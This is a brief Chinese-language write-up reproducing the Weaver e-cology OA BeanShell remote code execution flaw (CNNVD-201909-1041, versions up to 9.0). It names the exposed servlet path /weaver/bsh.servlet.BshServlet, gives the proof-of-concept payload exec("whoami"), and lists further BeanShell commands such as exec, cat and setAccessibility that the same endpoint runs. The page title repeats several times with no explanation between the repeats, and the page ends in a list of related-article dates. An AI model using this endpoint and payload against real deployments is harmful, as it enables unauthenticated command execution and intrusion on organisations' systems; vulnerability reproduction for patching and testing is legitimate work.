靶机

影响版本 泛微e-cology<=9.0

https://github.com/jas502n/e-cology

部署

泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

复现

/weaver/bsh.servlet.BshServlet

POC

exec("whoami")

泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

这是BeanShell命令的其他一些示例

source(),run()-将bsh脚本读入该解释器,或在新的解释器中运行
frame()-在Frame或JFrame中显示GUI组件。
load(),save()-将可序列化的对象加载或保存到文件中。
cd(),cat(),dir(),pwd()等-类似于Unix的shell命令
exec()-运行本机应用程序
javap()-打印对象的方法和字段,类似于Java javap命令的输出。
setAccessibility()-打开对私有组件和受保护组件的无限制访问。

泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041
泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

参考:https://github.com/jas502n/e-cology

相关文章:

  • 2021-10-28
  • 2022-12-23
  • 2022-02-16
  • 2021-10-19
  • 2022-12-23
  • 2021-04-20
  • 2021-05-27
  • 2021-09-29
猜你喜欢
  • 2021-10-21
  • 2022-01-14
  • 2021-11-11
  • 2021-04-07
  • 2021-12-11
  • 2021-11-02
  • 2022-12-23
相关资源
相似解决方案